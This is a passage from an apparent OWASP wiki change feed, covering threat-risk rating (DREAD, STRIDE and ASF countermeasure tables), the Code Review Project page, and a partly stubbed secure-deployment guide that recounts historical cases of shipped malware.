# '''Damage potential:''' Threat to reputation as well as financial and legal liability:8&lt;br /&gt;
# '''Reproducibility:'''  Fully reproducible:10&lt;br /&gt;
# '''Exploitability:'''   Require to be on the same subnet or have compromised a router:7&lt;br /&gt;
# '''Affected users:'''   Affects all users:10&lt;br /&gt;
# '''Discoverability:'''  Can be found out easily:10&lt;br /&gt;
&lt;br /&gt;
Overall DREAD score: (8+10+7+10+10) / 5 = 9&lt;br /&gt;
&lt;br /&gt;
In this case having 9 on a 10 point scale is certainly an high risk threat&lt;br /&gt;
&lt;br /&gt;
==Generic Risk Model==&lt;br /&gt;
A more generic risk model takes into consideration the Likelihood (e.g. probability of an attack) and the Impact (e.g. damage potential): &lt;br /&gt;
&lt;br /&gt;
'''Risk = Likelihood x Impact'''&lt;br /&gt;
&lt;br /&gt;
The likelihood or probability is defined by the ease of exploitation, which mainly depends on the type of threat and the system characteristics, and by the possibility to realize a threat, which is determined by the existence of an appropriate countermeasure.  &lt;br /&gt;
&lt;br /&gt;
The following is a set of considerations for determining ease of exploitation: &lt;br /&gt;
# Can an attacker exploit this remotely? &lt;br /&gt;
# Does the attacker need to be authenticated?&lt;br /&gt;
# Can the exploit be automated?&lt;br /&gt;
&lt;br /&gt;
The impact mainly depends on the damage potential and the extent of the impact, such as the number of components that are affected by a threat. &lt;br /&gt;
&lt;br /&gt;
Examples to determine the damage potential are:&lt;br /&gt;
# Can an attacker completely take over and manipulate the system?  &lt;br /&gt;
# Can an attacker gain administration access to the system?&lt;br /&gt;
# Can an attacker crash the system? &lt;br /&gt;
# Can the attacker obtain access to sensitive information such as secrets, PII&lt;br /&gt;
&lt;br /&gt;
Examples to determine the number of components that are affected by a threat:&lt;br /&gt;
# How many data sources and systems can be impacted?&lt;br /&gt;
# How “deep” into the infrastructure can the threat agent go?&lt;br /&gt;
&lt;br /&gt;
These examples help in the calculation of the overall risk values by assigning qualitative values such as High, Medium and Low to Likelihood and Impact factors. In this case, using qualitative values, rather than numeric ones like in the case of the DREAD model, help avoid the ranking becoming overly subjective.&lt;br /&gt;
&lt;br /&gt;
==Countermeasure Identification==&lt;br /&gt;
The purpose of the countermeasure identification is to determine if there is some kind of protective measure (e.g. security control, policy measures) in place that can prevent each threat previosly identified via threat analysis from being realized. Vulnerabilities are then those threats that have no countermeasures. Since each of these threats has been categorized either with STRIDE or ASF, it is possible to find appropriate countermeasures in the application within the given category. &lt;br /&gt;
&lt;br /&gt;
Provided below is a brief and limited checklist which is by no means an exhaustive list for identifying countermeasures for specific threats. &lt;br /&gt;
 &lt;br /&gt;
Example of countermeasures for ASF threat types are included in the following table: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;ASF Threat &amp;amp; Countermeasures List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Threat Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Countermeasure&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authentication&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Credentials and authentication tokens are protected with encryption in storage and transit&lt;br /&gt;
#Protocols are resistant to brute force, dictionary, and replay attacks&lt;br /&gt;
#Strong password policies are enforced&lt;br /&gt;
#Trusted server authentication is used instead of SQL authentication&lt;br /&gt;
#Passwords are stored with salted hashes&lt;br /&gt;
#Password resets do not reveal password hints and valid usernames&lt;br /&gt;
#Account lockouts do not result in a denial of service attack&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authorization&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Strong ACLs are used for enforcing authorized access to resources&lt;br /&gt;
#Role-based access controls are used to restrict access to specific operations&lt;br /&gt;
#The system follows the principle of least privilege for user and service accounts&lt;br /&gt;
#Privilege separation is correctly configured within the presentation, business and data access layers&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Configuration Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Least privileged processes are used and service accounts with no administration capability&lt;br /&gt;
#Auditing and logging of all administration activities is enabled&lt;br /&gt;
#Access to configuration files and administrator interfaces is restricted to administrators&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Data Protection in Storage and Transit&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Standard encryption algorithms and correct key sizes are being used&lt;br /&gt;
#Hashed message authentication codes (HMACs) are used to protect data integrity&lt;br /&gt;
#Secrets (e.g. keys, confidential data ) are cryptographically protected both in transport and in storage&lt;br /&gt;
#Built-in secure storage is used for protecting keys&lt;br /&gt;
#No credentials and sensitive data are sent in clear text over the wire&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Data Validation / Parameter Validation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Data type, format, length, and range checks are enforced&lt;br /&gt;
#All data sent from the client is validated&lt;br /&gt;
#No security decision is based upon parameters (e.g. URL parameters) that can be manipulated&lt;br /&gt;
#Input filtering via white list validation is used&lt;br /&gt;
#Output encoding is used&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Error Handling and Exception Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#All exceptions are handled in a structured manner&lt;br /&gt;
#Privileges are restored to the appropriate level in case of errors and exceptions&lt;br /&gt;
#Error messages are scrubbed so that no sensitive information is revealed to the attacker&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User and Session Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#No sensitive information is stored in clear text in the cookie&lt;br /&gt;
#The contents of the authentication cookies is encrypted&lt;br /&gt;
#Cookies are configured to expire&lt;br /&gt;
#Sessions are resistant to replay attacks&lt;br /&gt;
#Secure communication channels are used to protect authentication cookies&lt;br /&gt;
#User is forced to re-authenticate when performing critical functions&lt;br /&gt;
#Sessions are expired at logout&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Auditing and Logging&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Sensitive information (e.g. passwords, PII) is not logged&lt;br /&gt;
#Access controls (e.g. ACLs) are enforced on log files to prevent un-authorized access&lt;br /&gt;
#Integrity controls (e.g. signatures) are enforced on log files to provide non-repudiation&lt;br /&gt;
#Log files provide for audit trail for sensitive operations and logging of key events&lt;br /&gt;
#Auditing and logging is enabled across the tiers on multiple servers&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When using STRIDE, the following threat-mitigation table can be used to identify techniques that can be employed to mitigate the threats.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;STRIDE Threat &amp;amp; Mitigation Techniques List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Threat Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Mitigation Techniques&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Spoofing Identity&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authentication&lt;br /&gt;
#Protect secret data&lt;br /&gt;
#Don't store secrets&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Tampering with data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authorization&lt;br /&gt;
#Hashes&lt;br /&gt;
#MACs&lt;br /&gt;
#Digital signatures&lt;br /&gt;
#Tamper resistant protocols&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Repudiation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Digital signatures&lt;br /&gt;
#Timestamps&lt;br /&gt;
#Audit trails&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Information Disclosure&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Authorization&lt;br /&gt;
#Privacy-enhanced protocols&lt;br /&gt;
#Encryption&lt;br /&gt;
#Protect secrets&lt;br /&gt;
#Don't store secrets&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Denial of Service&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authentication&lt;br /&gt;
#Appropriate authorization&lt;br /&gt;
#Filtering&lt;br /&gt;
#Throttling&lt;br /&gt;
#Quality of service&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Elevation of privilege&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Run with least privilege&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once threats and corresponding countermeasures are identified it is possible to derive a threat profile with the following criteria:&lt;br /&gt;
&lt;br /&gt;
# '''Non mitigated threats:''' Threats which have no countermeasures and represent vulnerabilities that can be fully exploited and cause an impact &lt;br /&gt;
# '''Partially mitigated threats:''' Threats partially mitigated by one or more countermeasures which represent vulnerabilities that can only partially be exploited and cause a limited impact &lt;br /&gt;
# '''Fully mitigated threats:''' These threats have appropriate countermeasures in place and do not expose vulnerability and cause impact&lt;br /&gt;
&lt;br /&gt;
===Mitigation Strategies===&lt;br /&gt;
The objective of risk management is to reduce the impact that the exploitation of a threat can have to the application. This can be done by responding to a theat with a risk mitigation strategy. In general there are five options to mitigate threats &lt;br /&gt;
# '''Do nothing:''' for example, hoping for the best&lt;br /&gt;
# '''Informing about the risk:''' for example, warning user population about the risk&lt;br /&gt;
# '''Mitigate the risk:''' for example, by putting countermeasures in place&lt;br /&gt;
# '''Accept the risk:''' for example, after evaluating the impact of the exploitation (business impact)&lt;br /&gt;
# '''Transfer the risk:''' for example, through contractual agreements and insurance&lt;br /&gt;
&lt;br /&gt;
The decision of which strategy is most appropriate depends on the impact an exploitation of a threat can have, the likelihood of its occurrence, and the costs for transferring (i.e. costs for insurance) or avoiding (i.e. costs or losses due redesign) it. That is, such decision is based on the risk a threat poses to the system. Therefore, the chosen strategy does not mitigate the threat itself but the risk it poses to the system. Ultimately the overall risk has to take into account the business impact, since this is a critical factor for the business risk management strategy. One strategy could be to fix only the vulnerabilities for which the cost to fix is less than the potential business impact derived by the exploitation of the vulnerability. Another strategy could be to accept the risk when the loss of some security controls (e.g. Confidentiality, Integrity, and Availability) implies a small degradation of the service, and not a loss of a critical business function. In some cases, transfer of the risk to another service provider might also be an option. &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Code_Review_Project&amp;diff=60010</id>
		<title>Category:OWASP Code Review Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Code_Review_Project&amp;diff=60010"/>
				<updated>2009-05-04T12:51:43Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Code review tool */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{OWASP Book|5678680}}&lt;br /&gt;
{{:Project Information:template Code Review Project}}&lt;br /&gt;
[[Category:OWASP Project]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Download]]&lt;br /&gt;
[[Category:OWASP Release Quality Document]]&lt;br /&gt;
&lt;br /&gt;
==Contents==&lt;br /&gt;
[[OWASP Code Review Guide Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
==Summer of Code 2008==&lt;br /&gt;
The Code review guide is proudly sponsored by the OWASP Summer of Code (SoC) 2008. For more information please see [[OWASP_Summer_of_Code_2008| OWASP Summer of Code 2008]].&lt;br /&gt;
&lt;br /&gt;
== Code Review Guide V1.1 Completed ==&lt;br /&gt;
The code review guide has been completed and is available here http://www.lulu.com/content/5678680 as a bound book.&lt;br /&gt;
&lt;br /&gt;
==Code review tool==&lt;br /&gt;
The following link is for the new version of Code Crawler, code review tool which examines code for keywords discussed in the section &amp;quot;[[Crawling Code]]&amp;quot;&amp;lt;br&amp;gt;It has a new look and feel and also uses MS SQL Server express. &lt;br /&gt;
&lt;br /&gt;
you can find it here: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://www.cyphersec.com/software_archive/CodeCrawler.rar It's a lightweight tool and undergoing constant development.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Source code can be found here:&lt;br /&gt;
http://www.cyphersec.com/software_archive/OWASP_Code_Crawler.zip&lt;br /&gt;
&lt;br /&gt;
== Owasp Orizon Code review engine ==&lt;br /&gt;
&lt;br /&gt;
The Owasp Orizon Project is born in 2006 to provide a set of APIs to provide an opensource engine to provide static analysis services to developers that wants to build a code review tool.&lt;br /&gt;
&lt;br /&gt;
The Owasp Orizon will evolve accordingly in order to implement security checks described in the Code Review Guide.&lt;br /&gt;
With the framework a UI is also provided in order to give people a standalone tool to realize code review for the security flaws listed in the &amp;quot;[[The Owasp Code Review Top 9]]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Owasp Orizon main page is available here: [[:Category:OWASP_Orizon_Project]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Source code is hosted at Sourceforge.net site: http://orizon.sourceforge.net&lt;br /&gt;
&lt;br /&gt;
== Spring Of Code 2007 ==&lt;br /&gt;
The Code review guide is proudly sponsored by the OWASP Spring of Code (SpOC) 2007.&lt;br /&gt;
For more information please see [[OWASP_Spring_Of_Code_2007|Spring of Code 2007]]&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Code Review project was conceived by Eoin Keary, the OWASP Ireland Founder and Chapter Lead. We are actively seeking individuals to add new sections as new web technologies emerge. If you are interested in volunteering for the project, or have a comment, question, or suggestion, please drop me a line  mailto:eoin.keary@owasp.org&lt;br /&gt;
&lt;br /&gt;
==Join the Code Review Team==&lt;br /&gt;
&lt;br /&gt;
All of the OWASP Guides are living documents that will continue to change as the threat and security landscape changes.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We welcome everyone to join the Code Review Guide Project and help us make this document great. The best way to get started is to subscribe to the mailing list by following the link below.  Please introduce yourself and ask to see if there is anything you can help with.  We are always looking for new contributions.  If there is a topic that you’d like to research and contribute, please let us know!&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://lists.owasp.org/mailman/listinfo/owasp-codereview&lt;br /&gt;
&lt;br /&gt;
==Roadmap==&lt;br /&gt;
&lt;br /&gt;
View the [[OWASP Code Review Project Roadmap]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Deployment&amp;diff=60009</id>
		<title>Deployment</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Deployment&amp;diff=60009"/>
				<updated>2009-05-04T12:30:13Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Stub}}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Guide Table of Contents| Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
Deployment is the first and sometimes the only experience system administrators will have with your application. Customers who buy or use your application appreciate the lower costs of securely deployed software – if their system administrators do not have to spend hours or days securing your software, they are far more likely to choose your software over an insecure competitor. &lt;br /&gt;
&lt;br /&gt;
Ease of deployment is a key consideration for many highly available or highly changeable systems. Systems have a special knack of buying the farm at 3 am Monday morning before the busiest day of the year. If your application can be trivially installed at 3 am by tired and emotional system administrators, they will remember you fondly when the time comes for new software or the next version. The worst case alternative is that your customers may not be around if your software takes three days to install. &lt;br /&gt;
&lt;br /&gt;
Secure deployment is essential for high value systems. High value systems require controls in excess of basic software. This chapter guides you through packaging and deployment issues.&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that the application is deployed as easily and as securely as possible.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
* Software should have automated installers and provide automated uninstallers&lt;br /&gt;
&lt;br /&gt;
* Software should deploy using a least privilege security model&lt;br /&gt;
&lt;br /&gt;
* Software should not expose any secrets once installed&lt;br /&gt;
&lt;br /&gt;
* Documentation should not contain any default accounts, nor should the installer contain any pre-chosen or default accounts&lt;br /&gt;
&lt;br /&gt;
* Every configuration parameter must to be findable&lt;br /&gt;
&lt;br /&gt;
==Release Management ==&lt;br /&gt;
&lt;br /&gt;
Release management is a formal process designed to ensure that applications are released in a tested and controlled fashion. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Is there release management in place? If so, does it cover?&lt;br /&gt;
&lt;br /&gt;
* Deployment testing&lt;br /&gt;
&lt;br /&gt;
* Acceptance testing&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Read software quality assurance references &lt;br /&gt;
&lt;br /&gt;
* Write deployment instructions&lt;br /&gt;
&lt;br /&gt;
* Eliminate all steps that can be automated&lt;br /&gt;
&lt;br /&gt;
* Implement a deployment acceptance test&lt;br /&gt;
&lt;br /&gt;
==Secure delivery of code ==&lt;br /&gt;
&lt;br /&gt;
Attackers have been known to send malicious code to end users, so it is vital that your users and customers can obtain your software in a secure fashion. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Secure delivery of code is relatively simple to test, and even easier to rectify. &lt;br /&gt;
&lt;br /&gt;
* Pretend to be a normal customer. Obtain your software in the usual fashion.&lt;br /&gt;
&lt;br /&gt;
* Was it obtained from a retailer or other distributor in hard format? If so, does the software contain instructions on how to validate it against legitimate deliveries?&lt;br /&gt;
&lt;br /&gt;
* Does the media contain any viruses or harmful code?&lt;br /&gt;
&lt;br /&gt;
* Was it obtained from a third party download site? If so, does it contain an accurate link back to your site?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Secure &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Code signing  ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Permissions are set to least privilege ==&lt;br /&gt;
Application owner  must to use a different user than sys admin. Only sys admin have access to root password. &lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
* every employee can access with root/admin user&lt;br /&gt;
*deployment procedures want system privileges&lt;br /&gt;
* live application want system privileges to start&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
* create one user for every application&lt;br /&gt;
* every application must uses least privileges&lt;br /&gt;
* deploy and start command does not use root/admin privileges&lt;br /&gt;
&lt;br /&gt;
==Automated packaging ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Automated deployment ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Automated removal ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==No backup or old files ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Unnecessary features are off by default ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Setup log files are clean ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==No default accounts ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
* Identify the default user accounts that are standard with the product you are using.&lt;br /&gt;
* Run periodic tests to ensure none of the accounts you identify are enabled or exist.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
* Never generate common or default credentials.&lt;br /&gt;
* Always remove any default user accounts from the server and applications prior to deployment.&lt;br /&gt;
&lt;br /&gt;
==Easter eggs ==&lt;br /&gt;
&lt;br /&gt;
Easter eggs are mostly small (but sometimes not) hidden features. Often they will contain the developers' names or activate hidden advanced or developer features, but occasionally, they are more like mini-applications. For the most part, they have no business function.  &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
''Figure 7 Adobe InDesign CS SVG Easter Egg''&lt;br /&gt;
&lt;br /&gt;
Easter eggs are fairly popular with developers, but they are problematic from a software engineering and legal view point. Unless easter eggs have been sufficiently designed and tested, easter eggs can cause the application to crash or misbehave. For example, Word 97 contained a pinball game and Excel 97 contained a small flight simulator. If these crashed with unsaved data, the application is not acting within design parameters, opening up liability. &lt;br /&gt;
&lt;br /&gt;
However, there is a case for including debug functionality, as long as it is tested, not enabled by default, and is documented within the user or administration manual. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===It’s almost impossible to prevent clever  ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Malicious software ==&lt;br /&gt;
&lt;br /&gt;
The delivery of software is littered with examples of software delivered with something more than the users bargained for. &lt;br /&gt;
&lt;br /&gt;
Examples include:&lt;br /&gt;
&lt;br /&gt;
* Sony delivered First 4 Internet's XCP (Extended Copy Protection) rootkit on millions of audio disks, infecting at least half a million PCs. Major legal problems have ensued, and set copy prohibition technologies back at least five years&lt;br /&gt;
&lt;br /&gt;
* Microsoft through a lack of a quality assured distribution process (now resolved), distributed viruses on multiple occasions, such as the Word macro viruses Concept and Wazzu&lt;br /&gt;
&lt;br /&gt;
* Microsoft partner and premium support web sites were distributing Hotfixes with the FunLove virus in 2001&lt;br /&gt;
&lt;br /&gt;
* Hewlett-Packard had the FunLove virus on their web site, in 2000 and also 2006. Though in 2006 it was a printer that was no longer made and the Korean version of Windows 95 drivers for it, so not as big a deal as in 2000&lt;br /&gt;
&lt;br /&gt;
* Linux kernel with a backdoor was submitted to CVS tree in November 2003. It was spotted (by Larry McVoy) because it had been placed directly into CVS, not via  BitKeeper&lt;br /&gt;
&lt;br /&gt;
These examples show that distributing malicious software can be highly embarrassing, extremely expensive (in Sony’s case, hundreds of millions of dollars) to resolve, and they are often truly trivial to prevent. &lt;br /&gt;
&lt;br /&gt;
In the past, there has been a lot of confusion over the legal status of 'spyware' (e.g. software written so a boss can monitor his employees) and 'adware' (e.g. software written to collect and send back how many of a companies sites have been surfed to, or change keywords in search results). Often they have been distributed with free software, and the user has agreed in often vague and deliberately verbose legal agreements, that they can be installed on their system. Usually the adware is mentioned as a method to 'boost' the user's ability to use a shopping network, or it's mentioned that information might be sent back to 'assist in our marketing' or that of partners. This makes it sound as if it's akin to Web cookies, and that there'll be very little effect on system performance, and no privacy issues over what is sent back. However now that the public are becoming more aware of adware, the legal distinctions are clearer, and the IT security community are quickly learning which companies that write adware are prepared to play ball, make their warning notices more useful, make their software less covert, etc. and which are continuing to write software that violates the user's privacy and drains system resources.&lt;br /&gt;
&lt;br /&gt;
In most countries, it is now illegal to create, distribute, and use software that acts in a surreptitious and devious manner. Users will remember any vendor attempting such criminal sabotage and never buy from such vendors again. Sony is an excellent case of this; the rootkit scandal has done their reputation a great deal of damage. In Australia, such criminal acts are punishable with fines of up to $250,000 per infected computer, and up to 10 years imprisonment. Similar statutes and punishments exist in most countries. &lt;br /&gt;
&lt;br /&gt;
'''OWASP is not a source of legal advice; if you think your software flies close to the wind, you must seek competent legal opinion. Even better, do not create or distribute such software. Karma will bite you on the flip side. '''&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Does your software contain any malicious code, which performs unauthorized or damaging activity? This could be code like Sony’s root kit. If so remove it. &lt;br /&gt;
&lt;br /&gt;
Did you check your final software image for known:&lt;br /&gt;
&lt;br /&gt;
* viruses using at least one up to date virus scanner?&lt;br /&gt;
&lt;br /&gt;
* spyware using at least one up to date spyware scanner?&lt;br /&gt;
&lt;br /&gt;
You may also wish to check for rootkits as there are specific tools now available to do that, at least on the Windows and Unix platforms. &lt;br /&gt;
&lt;br /&gt;
Be aware that there are many free spyware scanners available which are not to be trusted. They may surreptitiously install spyware, then when they 'find' it,&lt;br /&gt;
